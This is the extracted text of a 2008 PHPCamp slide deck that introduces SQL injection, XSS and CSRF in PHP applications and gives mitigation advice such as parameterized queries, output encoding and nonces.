Embed Size (px)
DESCRIPTION
Presentation on OWASP PHP Top 5 and CSRF, presented at PHPCamp, Pune, on Sept'20th, 2008
Citation preview
![Page 1: [Php Camp]Owasp Php Top5+Csrf](https://reader035.pdfslide.us/reader035/viewer/2022062404/554b9ec1b4c905b3618b48b3/html5/thumbnails/1.jpg)
[PHPCamp] OWASP PHP Top 5 + CSRF
OWASP PHP Top 5plus CSRF
Bipin Upadhyay, Satyam Computers
http://projectbee.org/
![Page 2: [Php Camp]Owasp Php Top5+Csrf](https://reader035.pdfslide.us/reader035/viewer/2022062404/554b9ec1b4c905b3618b48b3/html5/thumbnails/2.jpg)
[PHPCamp] OWASP PHP Top 5 + CSRF
The first matrix I designed was quite
naturally, perfect. It was a work of art.
Flawless. Sublime. A triumph only equaled by
its monumental failure.
![Page 3: [Php Camp]Owasp Php Top5+Csrf](https://reader035.pdfslide.us/reader035/viewer/2022062404/554b9ec1b4c905b3618b48b3/html5/thumbnails/3.jpg)
[PHPCamp] OWASP PHP Top 5 + CSRF
Agenda
Introduction AppSecurity
– Why?– OWASP
OWASP PHP Top 5– The Boring 3– The Exciting 2– CSRF
![Page 4: [Php Camp]Owasp Php Top5+Csrf](https://reader035.pdfslide.us/reader035/viewer/2022062404/554b9ec1b4c905b3618b48b3/html5/thumbnails/4.jpg)
[PHPCamp] OWASP PHP Top 5 + CSRF
Agenda
Introduction AppSecurity
– Why?– OWASP
OWASP PHP Top 5– The Boring 3– The Exciting 2– CSRF
![Page 5: [Php Camp]Owasp Php Top5+Csrf](https://reader035.pdfslide.us/reader035/viewer/2022062404/554b9ec1b4c905b3618b48b3/html5/thumbnails/5.jpg)
[PHPCamp] OWASP PHP Top 5 + CSRF
Who Am I?
I am SpiderMan
Apart from that, I:– Work for Satyam Computers,– work as PHP Lead,– currently working on OpenSocial,– also work on App Sec, and– am also a part of OWASP Bangalore Chapter.
I can be pinged @:– Om-[AT]-Projectbee-[Dot]-org, &– http://projectbee.org/
![Page 6: [Php Camp]Owasp Php Top5+Csrf](https://reader035.pdfslide.us/reader035/viewer/2022062404/554b9ec1b4c905b3618b48b3/html5/thumbnails/6.jpg)
[PHPCamp] OWASP PHP Top 5 + CSRF
Agenda
Introduction AppSecurity
– Why?– OWASP
OWASP PHP Top 5 – Intro & Mitigation– The Boring 3– The Exciting 2– CSRF
![Page 7: [Php Camp]Owasp Php Top5+Csrf](https://reader035.pdfslide.us/reader035/viewer/2022062404/554b9ec1b4c905b3618b48b3/html5/thumbnails/7.jpg)
[PHPCamp] OWASP PHP Top 5 + CSRF
Network Sec. versus App Sec.
Ports
Firewall/IDS/IPS
80
443
0
65535
Web ServerAttacker
![Page 8: [Php Camp]Owasp Php Top5+Csrf](https://reader035.pdfslide.us/reader035/viewer/2022062404/554b9ec1b4c905b3618b48b3/html5/thumbnails/8.jpg)
[PHPCamp] OWASP PHP Top 5 + CSRF
Network Sec. versus App Sec…
Ports
Firewall/NATed IP
0
65535Malicious OR Compromised Web Server
Victim
![Page 9: [Php Camp]Owasp Php Top5+Csrf](https://reader035.pdfslide.us/reader035/viewer/2022062404/554b9ec1b4c905b3618b48b3/html5/thumbnails/9.jpg)
[PHPCamp] OWASP PHP Top 5 + CSRF
How serious is the matter!
90% of web applications have serious vulnerabilities –Gartner Group
78% of attacks are at the web application level –Symantec
XSS and SQLI replacing buffer overflows as the favourite hacker initiative –Mitre
Every 8-9/10 sites vulnerable to XSS –WASC
![Page 10: [Php Camp]Owasp Php Top5+Csrf](https://reader035.pdfslide.us/reader035/viewer/2022062404/554b9ec1b4c905b3618b48b3/html5/thumbnails/10.jpg)
[PHPCamp] OWASP PHP Top 5 + CSRF
Scary Cracks
Credit Cards & Google
Google.com UTF-7 XSS Vulnerability
Yamanner
“Samy is my Hero” OR Samy Worm
GMail CSRF Vulnerability
![Page 11: [Php Camp]Owasp Php Top5+Csrf](https://reader035.pdfslide.us/reader035/viewer/2022062404/554b9ec1b4c905b3618b48b3/html5/thumbnails/11.jpg)
[PHPCamp] OWASP PHP Top 5 + CSRF
OWASP
A free and open community focused on improving App Security
Guides, tools, etc. freely available for use
OWASP PHP TOP 5 is a list of top 5 PHP vulnerabilities
YOU can start your own project and/or contribute too
![Page 12: [Php Camp]Owasp Php Top5+Csrf](https://reader035.pdfslide.us/reader035/viewer/2022062404/554b9ec1b4c905b3618b48b3/html5/thumbnails/12.jpg)
[PHPCamp] OWASP PHP Top 5 + CSRF
Agenda
Introduction AppSecurity
– Why?– OWASP
OWASP PHP Top 5 – Intro & Mitigation– The Boring 3– The Exciting 2– CSRF
![Page 13: [Php Camp]Owasp Php Top5+Csrf](https://reader035.pdfslide.us/reader035/viewer/2022062404/554b9ec1b4c905b3618b48b3/html5/thumbnails/13.jpg)
[PHPCamp] OWASP PHP Top 5 + CSRF
OWASP Top 5
The Boring Trio – P1. Remote Code Execution– P4. PHP Configurations– P5. File System Attacks
The Exciting Duo – P3. SQL Injection Attacks– P2. XSS (Cross Site Scripting)
![Page 14: [Php Camp]Owasp Php Top5+Csrf](https://reader035.pdfslide.us/reader035/viewer/2022062404/554b9ec1b4c905b3618b48b3/html5/thumbnails/14.jpg)
[PHPCamp] OWASP PHP Top 5 + CSRF
OWASP Top 5
The Boring Trio – P1. Remote Code Execution– P4. PHP Configurations– P5. File System Attacks
Arguably, a little outdated
They don’t excite me enough to talk here
Read yourself :D
![Page 15: [Php Camp]Owasp Php Top5+Csrf](https://reader035.pdfslide.us/reader035/viewer/2022062404/554b9ec1b4c905b3618b48b3/html5/thumbnails/15.jpg)
[PHPCamp] OWASP PHP Top 5 + CSRF
OWASP Top 5
The Exciting Duo – P3. SQL Injection Attacks– P2. XSS (Cross Site Scripting)
Injection Attacks also regarded as A2 in OWASP Top 10
XSS stands A1 in OWASP Top 10
The femme-fatale attacks
![Page 16: [Php Camp]Owasp Php Top5+Csrf](https://reader035.pdfslide.us/reader035/viewer/2022062404/554b9ec1b4c905b3618b48b3/html5/thumbnails/16.jpg)
[PHPCamp] OWASP PHP Top 5 + CSRF
P3. SQL Injections – Intro
Unsanitized data entering databases, can be executed as an SQL query
![Page 17: [Php Camp]Owasp Php Top5+Csrf](https://reader035.pdfslide.us/reader035/viewer/2022062404/554b9ec1b4c905b3618b48b3/html5/thumbnails/17.jpg)
[PHPCamp] OWASP PHP Top 5 + CSRF
P3. SQL Injections – Intro
Unsanitized data entering databases, can be executed as an SQL query
Source: http://xkcd.com
![Page 18: [Php Camp]Owasp Php Top5+Csrf](https://reader035.pdfslide.us/reader035/viewer/2022062404/554b9ec1b4c905b3618b48b3/html5/thumbnails/18.jpg)
[PHPCamp] OWASP PHP Top 5 + CSRF
P3. SQL Injections – Intro
Demo
![Page 19: [Php Camp]Owasp Php Top5+Csrf](https://reader035.pdfslide.us/reader035/viewer/2022062404/554b9ec1b4c905b3618b48b3/html5/thumbnails/19.jpg)
[PHPCamp] OWASP PHP Top 5 + CSRF
P3. SQL Injections – Mitigation
Validate data; prefer whitelisting
Use PDO, if possible; OR
Use parameterized queries – MySqli or PEAR packages; OR
Use mysql_real_escape_string
Turn OFF magic_quotes_gpc
![Page 20: [Php Camp]Owasp Php Top5+Csrf](https://reader035.pdfslide.us/reader035/viewer/2022062404/554b9ec1b4c905b3618b48b3/html5/thumbnails/20.jpg)
[PHPCamp] OWASP PHP Top 5 + CSRF
P2. XSS – Intro
OWASP Top - 10 2007 #1
Any type of user input that is reflected back to the user without being purified.
Input can be HTML, CSS, or Javascript
Three kinds – Reflective, Persistent, & DOM Based XSS
![Page 21: [Php Camp]Owasp Php Top5+Csrf](https://reader035.pdfslide.us/reader035/viewer/2022062404/554b9ec1b4c905b3618b48b3/html5/thumbnails/21.jpg)
[PHPCamp] OWASP PHP Top 5 + CSRF
P2. XSS – Intro
XSS attacks include, but not limited to:– Cookie Theft & Session Hijacking– Site Defacement & Phishing– Key logging– History Theft– Port Scanning– CSRF & Web Worms– DoS-ing– … limited only by imagination
![Page 22: [Php Camp]Owasp Php Top5+Csrf](https://reader035.pdfslide.us/reader035/viewer/2022062404/554b9ec1b4c905b3618b48b3/html5/thumbnails/22.jpg)
[PHPCamp] OWASP PHP Top 5 + CSRF
P2. XSS – Intro
Reflective XSS Demo
Stored XSS Demo
![Page 23: [Php Camp]Owasp Php Top5+Csrf](https://reader035.pdfslide.us/reader035/viewer/2022062404/554b9ec1b4c905b3618b48b3/html5/thumbnails/23.jpg)
[PHPCamp] OWASP PHP Top 5 + CSRF
P2. XSS – Mitigation
Proper encoding can avoid most problems
Input Encoding– prefer UTF-8 and ISO-8859-1– refer http://ha.ckers.org/charsets.html
Output Encoding– avoid rich html input from user– decimal encode input – htmlspecialchars(), htmlentities()– refer OWASP_Encoding_Project
Use HTMLPurifier to allow white listed HTML
![Page 24: [Php Camp]Owasp Php Top5+Csrf](https://reader035.pdfslide.us/reader035/viewer/2022062404/554b9ec1b4c905b3618b48b3/html5/thumbnails/24.jpg)
[PHPCamp] OWASP PHP Top 5 + CSRF
CSRF – Intro
Also called Unauthorized Requests.
The server is punished/exploited for trusting the user.
CSRF is, arguably, more dangerous than XSS.
Doesn’t necessarily require javascript.
OWASP Top - 10 2007 #5, (also called the Sleeping Giant)
![Page 25: [Php Camp]Owasp Php Top5+Csrf](https://reader035.pdfslide.us/reader035/viewer/2022062404/554b9ec1b4c905b3618b48b3/html5/thumbnails/25.jpg)
[PHPCamp] OWASP PHP Top 5 + CSRF
CSRF – Intro
GET-CSRF Demo
POST-CSRF Demo
![Page 26: [Php Camp]Owasp Php Top5+Csrf](https://reader035.pdfslide.us/reader035/viewer/2022062404/554b9ec1b4c905b3618b48b3/html5/thumbnails/26.jpg)
[PHPCamp] OWASP PHP Top 5 + CSRF
CSRF – Mitigation
Identify points to protect; not all are equally important
Use nonces – one time tokens
Embed nonces in URL, or forms
![Page 27: [Php Camp]Owasp Php Top5+Csrf](https://reader035.pdfslide.us/reader035/viewer/2022062404/554b9ec1b4c905b3618b48b3/html5/thumbnails/27.jpg)
[PHPCamp] OWASP PHP Top 5 + CSRF
Purification algo
Sanitize anything that comes from the user.
Order of purification is equally important
![Page 28: [Php Camp]Owasp Php Top5+Csrf](https://reader035.pdfslide.us/reader035/viewer/2022062404/554b9ec1b4c905b3618b48b3/html5/thumbnails/28.jpg)
[PHPCamp] OWASP PHP Top 5 + CSRF
About Satyam
PHP– Satyam’s PHP Unit is actively involved in consulting and
developing PHP Based Web Applications– Also competent in smooth migration from existing infrastructure
to PHP based solutions– A well defined stack of tools, e.g. PHPUnit, Phing, Propel, Xinc,
etc., being used by developers for streamlined development
OpenSocial– Early adopters of OpenSocial– Dedicated team of Java & PHP developers working on
OpenSocial– Currently helping a Social Network, with 10 million registered
user base, become OpenSocial complaint
![Page 29: [Php Camp]Owasp Php Top5+Csrf](https://reader035.pdfslide.us/reader035/viewer/2022062404/554b9ec1b4c905b3618b48b3/html5/thumbnails/29.jpg)
[PHPCamp] OWASP PHP Top 5 + CSRF
String.fromCharCode(84,104,97,110,107,32,89,111,117,33)
i.e., Thank You!
![Page 30: [Php Camp]Owasp Php Top5+Csrf](https://reader035.pdfslide.us/reader035/viewer/2022062404/554b9ec1b4c905b3618b48b3/html5/thumbnails/30.jpg)
[PHPCamp] OWASP PHP Top 5 + CSRF
Thank You
Got Queries? Kindly raise your hands.
